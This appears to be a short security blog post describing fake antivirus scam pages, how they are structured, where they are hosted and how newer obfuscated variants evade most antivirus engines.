Malicious fake antivirus pages are pretty much all the same, with very straightforward code, which makes them relatively easy to detect. Most of these pages are also found just a few domains (mostly on sub-domains of xorg.pl, although the predominance of this domain has decreased lately), which makes it possible to denylist them (although this is not the best protection).
The "original" fake AV page is made of:
- a simple HTML page which displays a warning about your PC being infected, and displays a splash screen. The page title is always the same, as well as the text displayed, while the page is loading. The main page is displayed only if you come from a hacked site, direct access to the page will provide a 404 "page not found" error.
- the malicious executable is downloaded after the animation has completed, or when the user attempts to close the page
In addition to the code obfuscation, the page title as well as the waiting text are a little bit different from the original fake AV page. The malicious payload is detected by only 6 AV vendors out of 41. Another sample that I discovered was detected by only 2 AV vendors!